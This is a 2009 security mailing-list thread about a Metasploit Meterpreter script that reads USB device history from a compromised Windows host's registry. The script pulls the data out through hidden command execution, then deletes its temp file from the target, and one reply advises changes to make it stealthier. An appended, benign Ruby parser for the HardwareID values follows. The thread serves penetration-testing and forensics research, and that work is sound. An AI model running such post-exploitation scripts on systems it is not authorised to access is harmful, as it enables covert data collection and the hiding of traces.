If you want the data saved to a database, printed to the user and saved in
the logfile (if you have created a DB and it is loaded in Metasploit; if
not, it will not be saved to it):

include Msf::Auxiliary::Report
message.each_line do |line|
    print_status(line)
    report_note(:host => host, :proto => 'TLV', :port => port,
                :type => 'METERPRETER_INSTALLEDUSB', :data => line)
    filewrt(log, line)
end

I hope this is of help. If there is any other area where you might need
advice, let me know; I'm more than happy to help.


On Fri, Aug 14, 2009 at 7:58 PM, Carlos Perez <[email protected]> wrote:

> Save the data in the .msf3 log instead of writing it on the target; this
> will make your script smaller and more stealthy. Here is the function I
> use for this in my scripts:
>
> # Function for writing data to a file
> def filewrt(file2wrt, data2wrt)
>         output = ::File.open(file2wrt, "a")
>         data2wrt.each_line do |d|
>                 output.puts(d)
>         end
>         output.close
> end
>
> Just give it the log file and the data, like this:
>
> log = "#{logs}\\installedusb.txt"
> filewrt(log, message)
>
> To create the message string variable, do it like this:
>
> message = ""
> message << " " + "=" * 120 + "\n"
> message << "\tFriendly Name  : #{friendlyName.data}\n"
> message << "\t\t - Class      : #{cl.data}\n"
> message << "\t\t - DeviceDesc : #{deviceDesc.data}\n"
> message << "\t\t - HardwareID : #{hardwareID.data}\n"
>
> Iterate through each key, get the values, and close the key before going to
> the next.
>
> I hope this helps.
>
>
> On Fri, Aug 14, 2009 at 4:47 PM, Dimitrios Kapsalis <[email protected]> wrote:
>
>> Here is a meterpreter script to pull the USB devices from the registry.
>>
>> I have a few issues saving the output to a text file on the target before
>> downloading it. I think it's the \n that I'm adding. If anyone has any tips,
>> I'm all ears.
>>
>> As well, the output on the meterpreter screen will be:
>>
>> run installedusb
>> [*] New session on 192.168.0.50:43304...
>> [*] -- Files saved to C:\Documents and Settings\user\Application
>> Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964...
>> [*] -- Data logged to C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
>> [*] Dumping software installed on pc per registry
>> HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR...
>> [*]
>> ========================================================================================================================
>>         * Friendly Name  : Apple iPod USB Device
>>             - Class      : DiskDrive
>>             - DeviceDesc : Disk drive
>>             - HardwareID :
>> USBSTOR\DiskApple___iPod____________1.62?USBSTOR\DiskApple___iPod____________?USBSTOR\DiskApple___?USBSTOR\Apple___iPod____________1?Apple___iPod____________1?USBSTOR\GenDisk?GenDisk??
>>
>> [*]     -- Downloading C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
>> [*]     -- C:\Documents and Settings\user\Application
>> Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964\installedusb.txt
>> downloaded!
>> [*] ...Done!!
>> [*] Completed processing on 192.168.0.50:43304...
>>
>>
>> [code]
>> #
>> # This is a Meterpreter script designed to be used by the Metasploit
>> # Framework
>> #
>> # Meterpreter script for pulling forensics data from registry for any USB
>> # device connected to system
>> #
>> # Provided by Dimitrios Kapsalis
>> # Version: 0.1
>>
>>
>> require 'fileutils'
>>
>> # ====================================================================
>> # Print message to file on target
>> # ====================================================================
>> def m_writetofile(session,file,message)
>>   # Note: message is interpolated straight into a cmd.exe command line, so
>>   # newlines inside it are not carried through to the file, and cmd
>>   # metacharacters (&, |, >) in message would be interpreted, not echoed.
>>   cmd = "cmd /c echo #{message} >> #{file}"
>>   m_exec(session, cmd)
>> end
>>
>> # ====================================================================
>> # Delete a file (meterpreter has no unlink API yet)
>> # ====================================================================
>> def m_unlink(session, path)
>>   r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil,
>>                                   {'Hidden' => 'true'})
>>   # Wait for the process to finish before closing the handle
>>   while(r.name)
>>     select(nil, nil, nil, 0.10)
>>   end
>>   r.close
>> end
>>
>> # ====================================================================
>> # Exec a command and return the results
>> # ====================================================================
>> def m_exec(session, cmd)
>>   begin
>>     r = session.sys.process.execute(cmd, nil, {'Hidden' => true,
>>                                                'Channelized' => true})
>>     b = ""
>>     # Read the channelized output until the process closes it
>>     while(d = r.channel.read)
>>       b << d
>>     end
>>     r.channel.close
>>     r.close
>>     b
>>   rescue ::Exception => e
>>     print_status("Error Running Command #{cmd}: #{e.class} #{e}")
>>   end
>> end
>>
>> # ====================================================================
>> # Function to upload files
>> # ====================================================================
>> def m_upload(session,file)
>>   location = session.fs.file.expand_path("%temp%")
>>   fileontrgt = "#{location}\\#{rand(100)}.exe"
>>   print_status("\t-- Uploading #{file}....")
>>   session.fs.file.upload_file("#{fileontrgt}","#{file}")
>>   print_status("\t-- #{file} uploaded!")
>>   print_status("\t-- File on target #{fileontrgt}")
>>   return fileontrgt
>> end
>>
>> # ====================================================================
>> # Function to download files
>> # ====================================================================
>> def m_download(session,src,dst)
>>   print_status("\t-- Downloading #{src}....")
>>   session.fs.file.download_file("#{dst}","#{src}")
>>   print_status("\t-- #{dst} downloaded!")
>> end
>>
>> # ====================================================================
>> # Script proper
>> # ====================================================================
>>
>> # The 'client' object holds the Meterpreter session
>> # Aliasing here for plugin compatibility
>> session = client
>>
>> script_name = "installedsoftware"
>>
>> # Extract the host and port
>> host,port = session.tunnel_peer.split(':')
>>
>> print_status("New session on #{host}:#{port}...")
>>
>> # Create a directory for the logs
>> logs = ::File.join(Msf::Config.config_directory, 'logs', script_name,
>>                    host + "_" + Time.now.strftime("%Y%m%d.%M%S") +
>>                    sprintf("%.5d", rand(100000)))
>>
>> # Create the log directory
>> ::FileUtils.mkdir_p(logs)
>>
>> print_status("-- Files saved to #{logs}...")
>>
>> # Temporary output file on the target
>> location = session.fs.file.expand_path("%temp%")
>> filename = "#{rand(100)}.dat"
>> fileontrgt = "#{location}\\#{filename}"
>> print_status("-- Data logged to #{fileontrgt}....")
>>
>>
>> begin
>>
>>     # ================================================================
>>     #    Pull USB history
>>     # ================================================================
>>
>>     # Dump USB device history
>>     key = "HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR"
>>     root_key, base_key = session.sys.registry.splitkey(key)
>>
>>     message = "---------------------------------------------------------------------"
>>     m_writetofile(session,fileontrgt,message)
>>     message = "Dumping software installed on pc per registry #{key}... "
>>     print_status(message)
>>     m_writetofile(session,fileontrgt,message)
>>     message = "---------------------------------------------------------------------"
>>     m_writetofile(session,fileontrgt,message)
>>
>>     # One subkey per device model, one subkey below that per instance
>>     session.sys.registry.create_key(root_key, base_key).each_key() do |device|
>>         puts device
>>
>>         session.sys.registry.create_key(root_key,
>>                                         "#{base_key}\\#{device}").each_key() do |intermediate|
>>             puts intermediate
>>
>>             rk = session.sys.registry.open_key(root_key,
>>                                                "#{base_key}\\#{device}\\#{intermediate}", KEY_READ)
>>             cl = rk.query_value("class")
>>             deviceDesc = rk.query_value("DeviceDesc")
>>             friendlyName = rk.query_value("FriendlyName")
>>             hardwareID = rk.query_value("HardwareID")
>>             message = "\n" + "=" * 120 + "\n" <<
>>                       "        * Friendly Name  : #{friendlyName.data}\n" <<
>>                       "            - Class      : #{cl.data}\n" <<
>>                       "            - DeviceDesc : #{deviceDesc.data}\n" <<
>>                       "            - HardwareID : #{hardwareID.data}\n"
>>
>>             print_status(message)
>>             m_writetofile(session,fileontrgt,message)
>>         end
>>     end
>>
>>     # download output file
>>     m_download(session, fileontrgt, "#{logs}\\installedusb.txt")
>>
>>     sleep(3)
>>
>>     # delete output file from target system
>>     m_unlink(session, fileontrgt)
>>     print_status("...Done!!")
>>
>> rescue ::Exception => e
>>     print_status("Exception: #{e.class} #{e} #{e.backtrace}")
>> end
>>
>> print_status("Completed processing on #{host}:#{port}...")
>> [/code]
>>
>>
>>
>>
>> On Fri, Aug 14, 2009 at 12:57 PM, Dave Hull <[email protected]> wrote:
>>
>>> The user assist keys are ROT13 encoded!
>>>
>>> There's just so much good stuff. Volume shadow copies and restore
>>> points too. And the list goes on...
>>> _______________________________________________
>>> Pauldotcom mailing list
>>> [email protected]
>>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
>>> Main Web Site: http://pauldotcom.com
>>>
>>
>>
>>
>
>
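As an added example (not code from this thread or from the script posted in it), here is a small Ruby parser for the four values the script reads under each USBSTOR instance key, turning the HardwareID list shown in the output above into vendor/product/revision fields a forensic analyst can query. The function and constant names are mine; the assumed field layout (vendor 8 characters, product 16, revision up to 4, underscore-padded) is the USBSTOR compatible-ID form visible in the iPod output, and the SanDisk sample is constructed.

```ruby
# Added example (not code from the thread or from the script in it): parse the
# four values the script reads under each
# HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR\<device>\<instance> key into a
# structured record, so the log can be queried instead of eyeballed.
#
# HardwareID is a REG_MULTI_SZ, i.e. several NUL-terminated strings. When the
# whole buffer is interpolated into one Ruby string those NULs are what print
# as '?' in the thread's output. The most specific ID follows the USBSTOR
# compatible-ID layout (assumed here, from the SCSI INQUIRY fields):
#   USBSTOR\Disk + vendor (8 chars) + product (16 chars) + revision (up to 4)
# with each field padded to width using underscores.

USBSTOR_DISK_ID =
  /\AUSBSTOR\\Disk(?<vendor>.{8})(?:(?<product>.{16})(?<rev>.{1,4})?)?\z/

# Split a REG_MULTI_SZ buffer into its member strings. Accepts the real NUL
# separators as well as the '?' that a lossy print of the buffer turns them into.
def split_multi_sz(raw)
  raw.split(/[\x00?]/).reject(&:empty?)
end

# Strip the underscore padding of a fixed-width INQUIRY field (nil stays nil).
def unpad(field)
  field && field.sub(/_+\z/, '')
end

# {vendor:, product:, revision:} for a "USBSTOR\Disk..." hardware ID, or nil
# for the less specific compatible IDs (USBSTOR\GenDisk, GenDisk, ...).
def parse_usbstor_hardware_id(id)
  m = USBSTOR_DISK_ID.match(id) or return nil
  { vendor: unpad(m[:vendor]), product: unpad(m[:product]), revision: unpad(m[:rev]) }
end

# One record from the four registry values the script queries. The vendor,
# product and revision come from the first hardware ID that parses.
def usb_device_record(dev_class, device_desc, friendly_name, hardware_id_raw)
  ids = split_multi_sz(hardware_id_raw)
  parsed = ids.map { |id| parse_usbstor_hardware_id(id) }.compact.first || {}
  { class: dev_class, device_desc: device_desc, friendly_name: friendly_name,
    hardware_ids: ids }.merge(parsed)
end

# Same layout as the message block in the thread, built as one string that is
# written to a local log rather than echoed through cmd.exe on the target.
def format_record(rec)
  lines = ["=" * 120,
           "\t* Friendly Name  : #{rec[:friendly_name]}",
           "\t\t- Class      : #{rec[:class]}",
           "\t\t- DeviceDesc : #{rec[:device_desc]}",
           "\t\t- HardwareID : #{rec[:hardware_ids].join(' | ')}"]
  if rec[:vendor]
    lines << "\t\t- Vendor/Product/Rev : #{rec[:vendor]} / #{rec[:product]} / #{rec[:revision]}"
  end
  lines.join("\n") + "\n"
end

# Constructed sample input: the iPod entry from the thread's output with its
# NUL separators restored, and a second, made-up SanDisk device.
SAMPLE_IPOD_HWID = ["USBSTOR\\DiskApple___iPod____________1.62",
                    "USBSTOR\\DiskApple___iPod____________",
                    "USBSTOR\\DiskApple___",
                    "USBSTOR\\Apple___iPod____________1",
                    "Apple___iPod____________1",
                    "USBSTOR\\GenDisk",
                    "GenDisk"].join("\x00") + "\x00\x00"
SAMPLE_CRUZER_HWID = "USBSTOR\\DiskSanDisk_Cruzer__________1.00\x00USBSTOR\\GenDisk\x00\x00"

if __FILE__ == $PROGRAM_NAME
  puts format_record(usb_device_record("DiskDrive", "Disk drive",
                                       "Apple iPod USB Device", SAMPLE_IPOD_HWID))
  puts format_record(usb_device_record("DiskDrive", "Disk drive",
                                       "SanDisk Cruzer USB Device", SAMPLE_CRUZER_HWID))
end
```

Splitting on the NUL separators first, rather than interpolating the raw REG_MULTI_SZ buffer into a string, is what keeps the `?` debris out of the log; the record hash can then be written with a local file append, which is the approach the reply above recommends over echoing through cmd.exe on the target.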